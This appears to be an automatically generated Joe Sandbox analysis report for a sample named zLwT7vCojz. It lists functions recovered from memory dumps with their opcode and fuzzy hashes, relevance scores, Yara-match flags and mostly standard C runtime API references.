Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: ed0e070ae82ea7b03d452a3238dcfa200e972e8fd778a390062a8eb07dfcae26
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0B9188721080E38AD729433984B403FFFE15A523A131A47BFD8F2DA2C5EE38D565D624

Uniqueness

Uniqueness Score: -1.00%

Function 0432BF91 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: a1ce57146e022f59295ab6ef4fd59565376a955944d92dd3dd223fd7e76b0e04
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 319176722084B34ADB2D467E967503EFFE15B422A130A779EE4F2CA5C1FE14F164DA20

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD2A Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 6e91bfac425e3a666a0d8c6cf14f20edb49d438ec97fef1b2b2bf4ad68d189c8
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: CC9153721080A349DB294639857457FFFE1DA513A131A07BFE4F2EB2C1EF3885549AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0432BCE7 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: fee4cdd08afd2022bd286f779ea537db1867bb5bd1a7cfa999549e41f2ae3383
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 138156722080B34ADB6D4E3E967457EFFE15A412A130A679EE4F2CE5C1FE14F164DA20

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA80 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 21a1932339db512cfe7dd20ca352f55fe73c90360b224481a7d01d4506c652c6
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 408155722080A34AEB294639847403FFFE1DA513A131A07BFE4F2DA6C5EF38D555966C

Uniqueness

Uniqueness Score: -1.00%

Function 0432C907 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
Instruction ID: eaf60fd4a6414e416714384e2038e6bfd0a2c5dd50028b12a52d43e38ae33222
Opcode Fuzzy Hash: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
Instruction Fuzzy Hash: A81103B72011B247D614CE7DEAB42BEF785FBC6320B2D737AD0818B759D222B645D604

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
Instruction ID: e6e99f41677c303f580e472dd2adf8d7d27793ec118e7d73ac2b1e44355bdfb2
Opcode Fuzzy Hash: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
Instruction Fuzzy Hash: 301105B7200183C7D6148B6DC8F45B7A795EAC6320B2D437BD441AB7D8D33AA9459E0C

Uniqueness

Uniqueness Score: -1.00%

Function 043AD1AB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43ad000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 07468e9002178722b2ce085288cdec5a44da1d19e83ba1586efb16b2663a1880
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: C911A172380104AFE744DF55DCC5FA673EAEB88364B198065ED04CB716E675E812C760

Uniqueness

Uniqueness Score: -1.00%

Function 04320D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 405ad84ec7ab6f843ddc86f4517bc1886342da18c4368a51d964f369b22871f7
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 61012B766116108FDF25CF20CA04BAA33F5FB85305F0544B4E606D7281E370B845CB80

Uniqueness

Uniqueness Score: -1.00%

Function 043321D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04332241
_free.LIBCMT ref: 04332257
_free.LIBCMT ref: 04332268
_free.LIBCMT ref: 04332279
_free.LIBCMT ref: 04332290
GetCPInfo.KERNEL32(?,?), ref: 043322D8

Part of subcall function 0433B4DE: _free.LIBCMT ref: 0433B549

_free.LIBCMT ref: 04332484
_free.LIBCMT ref: 04332497
_free.LIBCMT ref: 043324A5
_free.LIBCMT ref: 043324B0
_free.LIBCMT ref: 043324F2
_free.LIBCMT ref: 043324FA
_free.LIBCMT ref: 04332502
_free.LIBCMT ref: 0433250A
_free.LIBCMT ref: 04332518

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
Instruction ID: be0c7f41622c0834781820e5c80c0c4c42947f0d62a81a89eccdb0a5eabaeaa5
Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
Instruction Fuzzy Hash: AEB19D71900305AFEB21DFB9C880BEFBBF5BF08305F1450A9E995A7251DB36B9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B277: _free.LIBCMT ref: 0041B2E2

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 0433F8B8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0433F8FC

Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC68
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC7A
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC8C
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC9E
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECB0
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECC2
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECD4
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECE6
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECF8
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED0A
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED1C
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED2E
Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED40

_free.LIBCMT ref: 0433F8F1

Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529

_free.LIBCMT ref: 0433F913
_free.LIBCMT ref: 0433F928
_free.LIBCMT ref: 0433F933
_free.LIBCMT ref: 0433F955
_free.LIBCMT ref: 0433F968
_free.LIBCMT ref: 0433F976
_free.LIBCMT ref: 0433F981
_free.LIBCMT ref: 0433F9B9
_free.LIBCMT ref: 0433F9C0
_free.LIBCMT ref: 0433F9DD
_free.LIBCMT ref: 0433F9F5

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
Instruction ID: fd6b2c76ee768f96f3cd1c5c341bab536b5a8988150fda4bf3fe33e653f3fdb8
Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
Instruction Fuzzy Hash: 82318D31A00705BFFB31AA79D845B5AB7E9EF0031EF50642AE499D7190DF3AF9818B11

Uniqueness

Uniqueness Score: -1.00%

Function 0041F651 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F695

Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9

_free.LIBCMT ref: 0041F68A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F6AC
_free.LIBCMT ref: 0041F6C1
_free.LIBCMT ref: 0041F6CC
_free.LIBCMT ref: 0041F6EE
_free.LIBCMT ref: 0041F701
_free.LIBCMT ref: 0041F70F
_free.LIBCMT ref: 0041F71A
_free.LIBCMT ref: 0041F752
_free.LIBCMT ref: 0041F759
_free.LIBCMT ref: 0041F776
_free.LIBCMT ref: 0041F78E

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAE2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EB2A
_free.LIBCMT ref: 0041EB4E
_free.LIBCMT ref: 0041EB5B
_free.LIBCMT ref: 0041EB80
_free.LIBCMT ref: 0041EB8D
_free.LIBCMT ref: 0041EB96
_free.LIBCMT ref: 0041EE74
_free.LIBCMT ref: 0041EE7C

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798

Uniqueness

Uniqueness Score: -1.00%

Function 00423356 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379

Strings

log10, xrefs: 004233C3, 00423413
pow, xrefs: 0042345D, 00423509, 0042351C
asin, xrefs: 004234E5
log, xrefs: 0042341F, 0042342B
_CB, xrefs: 0042355E
acos, xrefs: 004234F1
exp, xrefs: 0042343E, 004234A0
sqrt, xrefs: 004234FD

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: DecodePointer
String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-940912563
Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 04336E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04336EA0

Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529

_free.LIBCMT ref: 04336EAC
_free.LIBCMT ref: 04336EB7
_free.LIBCMT ref: 04336EC2
_free.LIBCMT ref: 04336ECD
_free.LIBCMT ref: 04336ED8
_free.LIBCMT ref: 04336EE3
_free.LIBCMT ref: 04336EEE
_free.LIBCMT ref: 04336EF9
_free.LIBCMT ref: 04336F07

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
Instruction ID: 461ec1459796bf5d582af0edcdcdd03a619bbb33600cc307031c86bc8e2d8f55
Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
Instruction Fuzzy Hash: 9A11E376100408BFEB21EF94C842CDD3FA5EF14359B0194A1FA088F224DA36FA509F81

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: 55177262ea2afd16f9533dae2115e5600a8f627848f4ff0f88f433b0e8276529
Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
Opcode Fuzzy Hash: 55177262ea2afd16f9533dae2115e5600a8f627848f4ff0f88f433b0e8276529
Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 043243F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 043243F5
std::_Lockit::_Lockit.LIBCPMT ref: 04324404
int.LIBCPMT ref: 0432441B

Part of subcall function 0432157F: std::_Lockit::_Lockit.LIBCPMT ref: 04321590
Part of subcall function 0432157F: std::_Lockit::~_Lockit.LIBCPMT ref: 043215AA

std::locale::_Getfacet.LIBCPMT ref: 04324424
std::_Facet_Register.LIBCPMT ref: 04324455
std::_Lockit::~_Lockit.LIBCPMT ref: 0432446B
__CxxThrowException@8.LIBVCRUNTIME ref: 04324491

Strings

{wB, xrefs: 043243F0

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID: {wB
API String ID: 1202896665-1598656814
Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
Instruction ID: 4566b6b43a131aa91136d7c73eba72ff0a7b78b1645c66865895e426ba595002
Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
Instruction Fuzzy Hash: A31127329005349BDB05EBA4DE00AEE7B75FF94718F20111AE801B3290DB34BA01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04323651 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04323656
std::_Lockit::_Lockit.LIBCPMT ref: 04323665
int.LIBCPMT ref: 0432367C

Part of subcall function 0432157F: std::_Lockit::_Lockit.LIBCPMT ref: 04321590
Part of subcall function 0432157F: std::_Lockit::~_Lockit.LIBCPMT ref: 043215AA

std::locale::_Getfacet.LIBCPMT ref: 04323685
std::_Facet_Register.LIBCPMT ref: 043236B6
std::_Lockit::~_Lockit.LIBCPMT ref: 043236CC
__CxxThrowException@8.LIBVCRUNTIME ref: 043236F2

Strings

{wB, xrefs: 04323651

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID: {wB
API String ID: 1202896665-1598656814
Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
Instruction ID: 1a3f1d1ad09e8f96fdd713a2e783f7703b4b958cc9fb95aa3c3f37af67f3ad55
Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
Instruction Fuzzy Hash: AB11E3729002399BEB05EBA4CA44AEEBB79FF84724F14141AE811B7290DB74AA00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0432385C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04323861
std::_Lockit::_Lockit.LIBCPMT ref: 04323870
int.LIBCPMT ref: 04323887

Part of subcall function 0432157F: std::_Lockit::_Lockit.LIBCPMT ref: 04321590
Part of subcall function 0432157F: std::_Lockit::~_Lockit.LIBCPMT ref: 043215AA

std::locale::_Getfacet.LIBCPMT ref: 04323890
std::_Facet_Register.LIBCPMT ref: 043238C1
std::_Lockit::~_Lockit.LIBCPMT ref: 043238D7
__CxxThrowException@8.LIBVCRUNTIME ref: 043238FD

Strings

{wB, xrefs: 0432385C

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID: {wB
API String ID: 1202896665-1598656814
Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
Instruction ID: 04817db925fd75b1fe1ede7c40d3ee5128b5068ebf28bc3cee45b8a97cfd3bd6
Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
Instruction Fuzzy Hash: E611E372E001389BDB15EBB4CA44AEEBB75FF84714F14142AE811B7290DB74AA04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04339514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
